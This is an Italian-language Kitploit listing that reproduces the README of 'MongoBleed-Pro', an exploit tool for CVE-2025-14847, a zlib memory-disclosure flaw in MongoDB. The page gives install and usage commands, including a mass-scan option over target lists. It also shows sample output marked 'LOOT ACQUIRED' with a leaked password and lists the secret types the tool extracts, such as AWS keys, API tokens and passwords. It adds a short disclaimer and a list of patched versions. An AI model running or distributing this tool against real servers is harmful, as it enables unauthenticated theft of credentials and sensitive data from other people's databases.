Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CVE-2025-14847_Expolit — una vulnerabilità critica di divulgazione della memoria nella gestione della compressione zlib di MongoDB. Questo strumento consente ai ricercatori di sicurezza di estrarre dati sensibili da istanze MongoDB vulnerabili. | Kitploit
Strumenti/GitHubGitHub/cybertechajju/cve-2025-14847_expolit
Memory ForensicsAnalisi delle VulnerabilitàExploitEsfiltrazione DatiRaccolta InformazioniPenetration TestingRilevamento SegretiApprendimento e FormazioneSicurezza dei Database

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi
GitHubcybertechajju/cve-2025-14847_expolit

CVE-2025-14847_Expolit

una vulnerabilità critica di divulgazione della memoria nella gestione della compressione zlib di MongoDB. Questo strumento consente ai ricercatori di sicurezza di estrarre dati sensibili da istanze MongoDB vulnerabili.

Vedi Repository
33338 mesi faRevisionato da Kitploit

MongoBleed-Pro ☠️

CVE Python License Status

Strumento avanzato per lo sfruttamento delle perdite di memoria di MongoDB
Continua ad imparare | Continua a hackerare con CyberTechAjju


🔥 Descrizione

MongoBleed-Pro è uno strumento di sfruttamento avanzato per CVE-2025-14847, una vulnerabilità critica di divulgazione della memoria nella gestione della compressione zlib di MongoDB. Questo strumento consente ai ricercatori di sicurezza di estrarre dati sensibili da istanze MongoDB vulnerabili.

⚠️ Dichiarazione di non responsabilità

Questo strumento è destinato esclusivamente a test di sicurezza autorizzati e scopi educativi. L'accesso non autorizzato a sistemi informatici è illegale. Ottenere sempre la dovuta autorizzazione prima di effettuare test.


💀 Dettagli della Vulnerabilità


🚀 Funzionalità

  • ☠️ Interfaccia stile hacker - Interfaccia terminale d'élite con animazioni
  • ⚡ Scansione multi-thread - Estrazione rapida della memoria con thread configurabili
  • 🎯 Rilevamento automatico delle vulnerabilità - Controllo automatico della vulnerabilità prima dello sfruttamento
  • 🔑 Rilevamento di pattern segreti - Trova chiavi AWS, token API, password, email
  • 📊 Progresso in tempo reale - Visualizzazione dal vivo della perdita di memoria
  • 💾 Esportazione dati - Salva i dati estratti in file per l'analisi
  • 🌐 Scansione di massa - Scansiona più target da file

📦 Installazione

root@kitploit:~
# Clone the repository
git clone https://github.com/cybertechajju/CVE-2025-14847_Expolit.git
cd CVE-2025-14847_Expolit

# Install dependencies
pip install -r requirements.txt

🎮 Utilizzo

Utilizzo Base

root@kitploit:~
python3 mongobleed_pro.py

Target Specifico

root@kitploit:~
python3 mongobleed_pro.py --target 192.168.1.100

Porta Personalizzata

root@kitploit:~
python3 mongobleed_pro.py --target 192.168.1.100:27018

Scansione di Massa

root@kitploit:~
python3 mongobleed_pro.py --file targets.txt

Opzioni Avanzate

root@kitploit:~
python3 mongobleed_pro.py --target 192.168.1.100 --threads 100 --min-offset 100 --max-offset 20000

Tutte le Opzioni


📸 Schermate

root@kitploit:~
╔══════════════════════════════════════════════════════════════╗
║  💀 INITIATING MEMORY EXTRACTION SEQUENCE 💀                 ║
╚══════════════════════════════════════════════════════════════╝

⚡ Target Acquired: 192.168.1.100:27017
   ✓ Port OPEN
   ☠️  VULNERABLE! Initiating attack...

  ◉ 0x0E31 │ nr_inactive_anon 134420\nnr_active_anon 110832...
  ☠️  LOOT ACQUIRED: 🔐 Password
      → admin_pass=SuperSecret123

╔══════════════════ EXTRACTION COMPLETE ══════════════════╗
║  💾 Bytes Extracted: 125,847
║  📦 Unique Fragments: 342
║  🔑 Secrets Found: 5
╚══════════════════════════════════════════════════════════╝

🔑 Tipi di Segreti Rilevati

  • 🔑 Chiavi AWS (AKIA...)
  • 🤖 Chiavi API OpenAI (sk-...)
  • 🐙 Token GitHub (ghp_...)
  • 🔐 Password e Segreti
  • 📧 Indirizzi Email

📁 File di Output

FileDescrizione
loot_<host>.txtSegreti estratti in formato leggibile
dump_<host>.binDump di memoria grezzo per analisi manuale

🛡️ Mitigazione

Se sei un amministratore MongoDB, aggiorna alle versioni corrette:

  • MongoDB 8.0.10+
  • MongoDB 7.3.6+
  • MongoDB 7.0.19+
  • MongoDB 6.0.23+

👤 Autore

CyberTechAjju

  • 🐦 Twitter: @CyberTechAjju

📜 Licenza

Questo progetto è concesso in licenza MIT - vedi il file LICENSE per i dettagli.


⭐ Supporto

Se hai trovato utile questo strumento, per favore dagli una ⭐ su GitHub!


「 Continua ad imparare | Continua a hackerare 」
Realizzato con ❤️ da CyberTechAjju

Scarica lo strumento
ProprietàDettagli
CVE IDCVE-2025-14847
Tipo di VulnerabilitàDivulgazione di Memoria
Versioni InteressateMongoDB < 8.0.10, < 7.3.6, < 7.0.19, < 6.0.23
Causa PrincipaleLettura eccessiva del buffer nella decompressione zlib
ImpattoPerdita di memoria remota non autenticata
ArgomentoDescrizionePredefinito
--targetIP/URL del targetRichiesta interattiva
--fileFile con elenco di targetNessuno
--threadsNumero di thread50
--min-offsetOffset minimo di memoria20
--max-offsetOffset massimo di memoria8192